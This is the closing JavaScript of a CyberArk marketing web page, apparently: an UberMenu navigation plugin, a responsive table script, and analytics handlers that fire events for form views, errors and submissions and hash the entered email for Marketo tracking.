            "toggle" == a && (a = b.$ubermenu.hasClass("ubermenu-responsive-collapse") ?
                "open" : "close");
            "open" == a ? (b.$ubermenu.removeClass("ubermenu-responsive-collapse"), c.trigger("ubermenutoggledopen"), c.toggleClass("ubermenu-responsive-toggle-open"), b.settings.aria_responsive_toggle && c.attr("aria-pressed", !0)) : (b.$ubermenu.addClass("ubermenu-responsive-collapse"), c.trigger("ubermenutoggledclose"), c.toggleClass("ubermenu-responsive-toggle-open"), b.settings.aria_responsive_toggle && c.attr("aria-pressed", !1));
            b.transitions && !b.$ubermenu.hasClass("ubermenu-responsive-nocollapse") && (b.$ubermenu.addClass("ubermenu-in-transition"),
                b.$ubermenu.on(b.transitionend + "_toggleubermenu", function() {
                    b.$ubermenu.removeClass("ubermenu-in-transition");
                    b.$ubermenu.off(b.transitionend + "_toggleubermenu")
                }))
        },
        positionSubmenus: function() {
            var a = this;
            "h" == a.orientation && a.$ubermenu.find(".ubermenu-submenu-drop.ubermenu-submenu-align-center").each(function() {
                var c = d(this).parent(".ubermenu-item"),
                    b = d(this);
                if (a.$ubermenu.hasClass("ubermenu-bound")) var e = c.closest(".ubermenu , .ubermenu-submenu");
                else if (a.$ubermenu.hasClass("ubermenu-bound-inner")) e =
                    c.closest(".ubermenu-nav , .ubermenu-submenu");
                else {
                    var g = c.closest(".ubermenu-submenu");
                    0 === g.length ? (e = a.$ubermenu.offsetParent()) || (e = d("body")) : e = g
                }
                var g = b.outerWidth(),
                    f = c.outerWidth(),
                    k = c.offset().left,
                    c = e.width();
                e = e.offset().left;
                f = k + f / 2 - (e + g / 2);
                f = 0 < f ? f : 0;
                g > c ? f = (g - c) / -2 : f + g > c && (b.css({
                    right: 0,
                    left: "auto"
                }), f = !1);
                !1 !== f && b.css("left", f)
            })
        },
        openSubmenu: function(a, c, b) {
            b = b || this;
            b.log("Open Submenu " + c);
            a.hasClass("ubermenu-active") || (a.addClass("ubermenu-active"), b.settings.aria_expanded && a.find(">.ubermenu-target,>.ubermenu-submenu").attr("aria-expanded",
                "true"), b.settings.aria_hidden && a.find(">.ubermenu-submenu").attr("aria-hidden", "false"), b.transitions && (a.addClass("ubermenu-in-transition"), a.find("> .ubermenu-submenu").on(b.transitionend + "_opensubmenu", function() {
                b.log("finished submenu open transition");
                a.removeClass("ubermenu-in-transition");
                d(this).off(b.transitionend + "_opensubmenu")
            })), a.trigger("ubermenuopen"))
        },
        closeSubmenu: function(a, c, b) {
            b = b || this;
            b.log("closeSubmenu " + a.find(">a").text() + " [" + c + "]");
            a.hasClass("ubermenu-item-has-children") &&
                a.hasClass("ubermenu-active") && (b.transitions && a.addClass("ubermenu-in-transition"), a.each(function() {
                    var a = d(this),
                        c = a.find("> .ubermenu-submenu");
                    if (b.transitions) c.on(b.transitionend + "_closesubmenu", function() {
                        b.log("finished submenu close transition");
                        a.removeClass("ubermenu-in-transition");
                        c.off(b.transitionend + "_closesubmenu")
                    })
                }));
            a.removeClass("ubermenu-active");
            a.trigger("ubermenuclose");
            b.settings.aria_expanded && a.find(">.ubermenu-target,>.ubermenu-submenu").attr("aria-expanded", "false");
            b.settings.aria_hidden && a.find(">.ubermenu-submenu").attr("aria-hidden", "true")
        },
        closeSubmenuInstantly: function(a) {
            0 !== a.length && (a.addClass("ubermenu-notransition"), a.removeClass("ubermenu-active").removeClass("ubermenu-in-transition"), a[0].offsetHeight, a.removeClass("ubermenu-notransition"), a.trigger("ubermenuclose"), this.settings.aria_expanded && a.find(">.ubermenu-target,>.ubermenu-submenu").attr("aria-expanded", "false"), this.settings.aria_hidden && a.find(">.ubermenu-submenu").attr("aria-hidden",
                "true"))
        },
        closeAllSubmenus: function() {
            var a = this.$ubermenu.find(".ubermenu-item-level-0.ubermenu-active");
            a.length && this.closeSubmenuInstantly(a);
            return a.length
        },
        resetHandlers: function(a, c, b) {
            b.log("ResetHandlers: " + c);
            a.off(this.touchEnd);
            a.off(this.touchMove);
            a = a.parent();
            a.off("mousemove.mouse_intent");
            a.off("mouseleave.mouse_intent_none");
            a.data("mouse_intent_timer", clearTimeout(a.data("mouse_intent_timer")));
            a.data("mouse_intent_state", 0)
        },
        log: function(a, c, b) {
            b = b || this;
            b.settings.debug && (b.settings.debug_onscreen ?
                this.debug_target.prepend('<div class="um-debug-content">' + a + "</div>") : console.log(a, c))
        }
    };
    d.fn.ubermenu = function(a) {
        var c = arguments;
        if (a === l || "object" === typeof a) return this.each(function() {
            d.data(this, "plugin_ubermenu") || d.data(this, "plugin_ubermenu", new k(this, a))
        });
        if ("string" === typeof a && "_" !== a[0] && "init" !== a) {
            var b;
            this.each(function() {
                var e = d.data(this, "plugin_ubermenu");
                e instanceof k && "function" === typeof e[a] && (b = e[a].apply(e, Array.prototype.slice.call(c, 1)));
                "destroy" === a && d.data(this,
                    "plugin_ubermenu", null)
            });
            return b !== l ? b : this
        }
    }
})(jQuery, window, document);
(function(d) {
    function f(f) {
        h || (h = !0, "undefined" != typeof console && "window.load" == f && console.log("Notice: UberMenu initialized via " + f + ".  This indicates that an unrelated error on the site prevented it from loading via the normal document ready event."), "." == window.location.hash.substring(1, 2) ? (f = d("body").find(window.location.hash.substring(1)), f.length && window.scrollTo(0, f.offset().top - ubermenu_data.scrollto_offset)) : window.location.hash.length && setTimeout(function() {
                try {
                    var f = d("body").find(window.location.hash);
                    f.length && window.scrollTo(0, f.offset().top - ubermenu_data.scrollto_offset)
                } catch (r) {}
            }, 100), d(".ubermenu-item:empty").each(function() {
                var f = d(this).parent();
                d(this).remove();
                0 == f.find(".ubermenu-item").length && (f.parent().removeClass("ubermenu-has-submenu-drop").removeClass("ubermenu-has-submenu-flyout").off().find(".ubermenu-target > .ubermenu-sub-indicator").remove(), f.remove())
            }), d("#wp-admin-bar-ubermenu_loading").remove(), d(".ubermenu").ubermenu({}), "undefined" !== typeof google && "undefined" !==
            typeof google.maps && "undefined" !== typeof google.maps.LatLng && d(".ubermenu-map-canvas").each(function() {
                var f = d(this),
                    h = f.attr("data-zoom") ? parseInt(f.attr("data-zoom")) : 8,
                    l = f.attr("data-lat") ? new google.maps.LatLng(f.attr("data-lat"), f.attr("data-lng")) : new google.maps.LatLng(40.7143528, -74.0059731),
                    m = new google.maps.Map(this, {
                        zoom: h,
                        mapTypeId: google.maps.MapTypeId.ROADMAP,
                        center: l
                    });
                f.attr("data-address") ? (new google.maps.Geocoder).geocode({
                    address: f.attr("data-address")
                }, function(a, c) {
                    c == google.maps.GeocoderStatus.OK &&
                        (m.setCenter(a[0].geometry.location), l = a[0].geometry.location, new google.maps.Marker({
                            map: m,
                            position: a[0].geometry.location,
                            title: f.attr("data-mapTitle")
                        }))
                }) : new google.maps.Marker({
                    map: m,
                    position: l,
                    title: f.attr("data-mapTitle")
                });
                var n = d(this).closest(".ubermenu-has-submenu-drop"),
                    q = function() {
                        google.maps.event.trigger(m, "resize");
                        m.setCenter(l);
                        m.setZoom(h);
                        n.off("ubermenuopen", q)
                    };
                n.on("ubermenuopen", q)
            }))
    }
    var h = !1;
    jQuery(function(d) {
        f("document.ready")
    });
    d(window).on("load", function() {
        f("window.load")
    })
})(jQuery);

function uberMenu_openMega(d) {
    jQuery(".ubermenu").ubermenu("openSubmenu", jQuery(d))
}

function uberMenu_openFlyout(d) {
    jQuery(".ubermenu").ubermenu("openSubmenu", jQuery(d))
}

function uberMenu_close(d) {
    jQuery(".ubermenu").ubermenu("closeSubmenu", jQuery(d))
}

function uberMenu_redrawSubmenus() {
    jQuery(".ubermenu").ubermenu("positionSubmenus")
};
</script>

<script>
    var flexTable;

    if (document.body.classList.contains('source-stream-6824673')) {
        jQuery('.table-responsive-stack').find("th").each(function (i) {
            jQuery('.table-responsive-stack td:nth-child(' + (i + 1) + ')').not('[colspan]').prepend('<span class="table-responsive-stack-thead">'+ jQuery(this).text() + ':</span> ');
            jQuery('.table-responsive-stack-thead').hide();
    });
     
    jQuery( '.table-responsive-stack' ).each(function() {
        var thCount = jQuery(this).find("th").length; 
        var rowGrow = 100 / thCount + '%';
        //console.log(rowGrow);
        jQuery(this).find("th, td").css('flex-basis', rowGrow);
    });
        
    flexTable = function() {
        if (jQuery(window).width() < 768) {
            jQuery(".table-responsive-stack").each(function (i) {
                jQuery(this).find(".table-responsive-stack-thead").show();
                jQuery(this).find('thead').hide();
            });
            
         // window is less than 768px   
         } else {      
            jQuery(".table-responsive-stack").each(function (i) {
               jQuery(this).find(".table-responsive-stack-thead").hide();
               jQuery(this).find('thead').show();
            });
        }
    // flextable   
    };      
      
    flexTable();      
    window.onresize = function(event) {
        flexTable();
    }; 
}
</script>
<script type="text/javascript">
  	EnlighterJS.init('pre.enl', 'code.enl', {
       	language : 'raw',
        theme: 'bootstrap4',
        indent : 2,
        textOverflow: 'scroll'
	});
</script><script>
// VIEW EVENTS
Hubs.Events.on('load', function(){    
    // ASSET IMPRESSION
    var ufPageTitle =  $("meta[name='title']").attr("content");
    var hiddenCTA = window.localStorage.getItem('flyptech-hub-108540') !== null && !$('div').hasClass('blocking-cta') && $('div.block-cta').children().length > 0;
    var ungatedAsset = $('body').hasClass('single-page') && !$('div').hasClass('blocking-cta') && Hubs.appInstance.itemType !== 'blogpost' && $('div.block-cta').children().length === 0;
    var prefix = $('#page-type-identifier').attr("data-tags");
    if ($('body').hasClass('single-page') && prefix !== null && prefix !== undefined){

    var tagArray = prefix.split(',');

        if (tagArray.includes('White paper')) {
            var ufAssetType = 'whitepapers';
        } else if (tagArray.includes('Infographic')) {
            var ufAssetType = 'infographics';
        } else if (tagArray.includes('EBook')) {
            var ufAssetType = 'ebooks';
        } else if (tagArray.includes('Product Datasheet')) {
            var ufAssetType = 'product datasheets';
        } else if (tagArray.includes('Solution Brief')) {
            var ufAssetType = 'solution briefs';
        } else if (tagArray.includes('Video')) {
            var ufAssetType = 'videos';
        } else if (tagArray.includes('Case Study')) {
            var ufAssetType = 'case studies';
        } else if (tagArray.includes('Webinar')) {
            var ufAssetType = 'webinars';
        } else if (tagArray.includes('Analyst Report')) {
            var ufAssetType = 'analyst reports';
        }
    }
    if (hiddenCTA) {
        let assetDownloadView = new CustomEvent('launch-AssetDownload',{
            'detail':{
                'asset_name': ufPageTitle,
                'asset_type': ufAssetType,
                'is_gated': 'Gated',
            }
        });
        document.querySelector('body').dispatchEvent(assetDownloadView);
    } else if (ungatedAsset){
        let assetDownloadView = new CustomEvent('launch-AssetDownload',{
            'detail':{
                'asset_name': ufPageTitle,
                'asset_type': ufAssetType,
                'is_gated': 'Ungated',
            }
        });
        document.querySelector('body').dispatchEvent(assetDownloadView);
    }

    // FORM IMPRESSIONS
    $( ".tile.cta-form" ).each(function(index) {
        var ctaData = $(this).data();
        var formID = ctaData.ctaId;
        if ((formID == 312282 || formID == 319542) && !hiddenCTA){ // Asset download
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Gated Assets',
                        'form_name': 'Gated Asset',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 314328){ // Demo Request
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Demo',
                        'form_name': 'Personalized Demo',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 314334){ // Contact Us
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Contact Us',
                        'form_name': 'Contact Us',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 314340){ // Discovery & Audit
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Assessments',
                        'form_name': 'Discovery & Audit',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 314343){ // EPM CTA
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Free Trial',
                        'form_name': 'Endpoint Privilege Manager Free Trial',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 351733){ // CEM CTA
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Free Trial',
                        'form_name': 'Cloud Entitlements Manager Free Trial',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            }else if (formID == 315201){ // Blueprint CTA
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Blueprint',
                        'form_name': 'CyberArk Blueprint Toolkit',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 315177){ // CyberArk Guided Tour
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Guided Tour',
                        'form_name': 'CyberArk Guided Tour',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 315153){ // Vendor Privilege Access Manager Free Trial
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Free Trial',
                        'form_name': 'Vendor Privilege Access Manager Free Trial',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 315189){ // Alero Guided Tour
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Guided Tour',
                        'form_name': 'Alero Guided Tour',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            } else if (formID == 315219){ // Privilege Cloud Demo
                let formViewEvent = new CustomEvent('launch-formView',{
                    'detail':{
                        'form_type': 'Demo',
                        'form_name': 'Privilege Access Manager Demo',
                        'form_id': formID
                    }
                });
                document.querySelector('body').dispatchEvent(formViewEvent);
            }
    });
});

// FORM ERRORS
Hubs.Events.on('ctaActivate', function(ctaId){
    $('.cta-submit-form').on('click', function() {
        setTimeout(function(){
            if ($('.fields-revealed .preview-form-field').hasClass('error')){
                if (ctaId == 312282 || ctaId == 319542){ // Asset download
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Gated Assets',
                            'form_name': 'Gated Asset',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 314328){ // Demo Request
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Demo',
                            'form_name': 'Personalized Demo',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 314334){ // Contact Us
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Contact Us',
                            'form_name': 'Contact Us',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 314340){ // Discovery & Audit
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Assessments',
                            'form_name': 'Discovery & Audit',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 314343){ // EPM CTA
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Free Trial',
                            'form_name': 'Endpoint Privilege Manager Free Trial',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 351733){ // CEM CTA
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Free Trial',
                            'form_name': 'Cloud Entitlements Manager Free Trial',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                }else if (ctaId == 315201){ // Blueprint CTA
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Blueprint',
                            'form_name': 'CyberArk Blueprint Toolkit',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 315177){ // CyberArk Guided Tour
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Guided Tour',
                            'form_name': 'CyberArk Guided Tour',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 315153){ // Vendor Privilege Access Manager Free Trial
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Free Trial',
                            'form_name': 'Vendor Privilege Access Manager Free Trial',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 315189){ // Alero Guided Tour
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Guided Tour',
                            'form_name': 'Alero Guided Tour',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                } else if (ctaId == 315219){ // Privilege Cloud Demo
                    let formErrorEvent = new CustomEvent('launch-formError',{
                        'detail':{
                            'form_type': 'Demo',
                            'form_name': 'Privilege Access Manager Demo',
                            'form_id': ctaId
                        }
                    });
                    document.querySelector('body').dispatchEvent(formErrorEvent);
                }
            }
        }, 500);
    });
});

// FORM SUBMISSIONS
Hubs.Events.on('ctaFormSubmitSuccess', function(ctaId, ctaData, ctaName){
    if (ctaId == 312282 || ctaId == 319542){ // Asset download
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Gated Assets',
                'form_name': 'Gated Asset',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 314328){ // Demo Request
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Demo',
                'form_name': 'Personalized Demo',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 314334){ // Contact Us
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Contact Us',
                'form_name': 'Contact Us',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 314340){ // Discovery & Audit
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Assessments',
                'form_name': 'Discovery & Audit',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 314343){ // EPM CTA
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Free Trial',
                'form_name': 'Endpoint Privilege Manager Free Trial',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 351733){ // CEM CTA
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Free Trial',
                'form_name': 'Cloud Entitlements Manager Free Trial',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    }else if (ctaId == 315201){ // Blueprint CTA
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Blueprint',
                'form_name': 'CyberArk Blueprint Toolkit',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 315177){ // CyberArk Guided Tour
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Guided Tour',
                'form_name': 'CyberArk Guided Tour',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 315153){ // Vendor Privilege Access Manager Free Trial
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Free Trial',
                'form_name': 'Vendor Privilege Access Manager Free Trial',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 315189){ // Alero Guided Tour
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Guided Tour',
                'form_name': 'Alero Guided Tour',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    } else if (ctaId == 315219){ // Privilege Cloud Demo
        let formSubmitEvent = new CustomEvent('launch-formSubmit',{
            'detail':{
                'form_type': 'Demo',
                'form_name': 'Privilege Access Manager Demo',
                'form_id': ctaId
            }
        });
        document.querySelector('body').dispatchEvent(formSubmitEvent);
    }
});
</script><script src="https://cdnjs.cloudflare.com/ajax/libs/js-sha256/0.9.0/sha256.min.js"></script>
<script>
$('form').on("blur","input",function(){
    var eInput = $('input[data-mapping="email"]').val();
    var eHash = sha256(eInput);
    $('input[data-mapping="marketoAnalyticsID"]').val(eHash);
});

Hubs.Events.on('ctaFormSubmitSuccess', function(){   
    var marketoAnalyticsID = $('input[data-mapping="marketoAnalyticsID"]').val();
    _satellite.cookie.set('marketoAnalyticsID', marketoAnalyticsID, {expires: 365});
});

Hubs.Events.on('ctaActivate', function(ctaId) {
    var cloudVisitorID = s.marketingCloudVisitorID;
    // $('input[data-mapping="ecids"]').val(cloudVisitorID);
    $('input[data-mapping="adobecloudid"]').val(cloudVisitorID);
});
</script><script>
var psArray = ["Privilege On Premises", "Vendor Privilege Access Manager", "Conjur Secrets Manager Enterprise", "Endpoint Privilege Manager", "Privilege Cloud", "CyberArk Identity", "Assessment Tools", "Services & Support"];
var topicArray = ["Automate Privileged Tasks", "Best Practices for Privileged Access Management", "Meet Audit and Compliance", "Mitigate Risk With Just-in-Time & Least Privilege", "Remove Local Admin Rights on Workstations", "Secure Application Credentials", "Secure Cloud Environments", "Secure DevOps Pipelines and Cloud Native Apps", "Secure Human Privileged Access", "Secure RPA Workloads", "Secure Third-Party Vendor and Remote Access", "Threat Research", "Secure Workforce Access", "Why CyberArk"];
var industryArray = ["Financial Services", "Healthcare", "Insurance", "Public Sector & Government", "US Federal Government"];
var typeArray = ["Analyst Report", "Blog", "Case Study", "EBook", "Infographic", "Product Datasheet", "Solution Brief", "Video", "Webinar", "White paper"];
var stageArray = ["Top Funnel", "Middle Funnel", "Bottom Funnel"];
var personaArray = ["Security Decision Maker", "Security Technical Influencer", "DevOps", "Cloud (Ops and Security)", "End point (Ops and Security)"];

var tagPrefix = $('#page-type-identifier').attr("data-tags");
if ($('body').hasClass('single-page') && tagPrefix !== null && tagPrefix !== undefined){
    var ufTagArray = tagPrefix.split(',');

    const psTags = psArray.filter(element => ufTagArray.includes(element));
    const topicTags = topicArray.filter(element => ufTagArray.includes(element));
    const industryTags = industryArray.filter(element => ufTagArray.includes(element));
    const typeTags = typeArray.filter(element => ufTagArray.includes(element));
    const stageTags = stageArray.filter(element => ufTagArray.includes(element));
    const personaTags = personaArray.filter(element => ufTagArray.includes(element));

    window.digital_data = {};
    
    window.digital_data = {
        resource: {
            'products_services': psTags,
            'topics': topicTags,
            'industry': industryTags,
            'content_type': typeTags,
            'buying_stage': stageTags,
            'persona': personaTags,
        }
    };
}
</script></body>
</html>
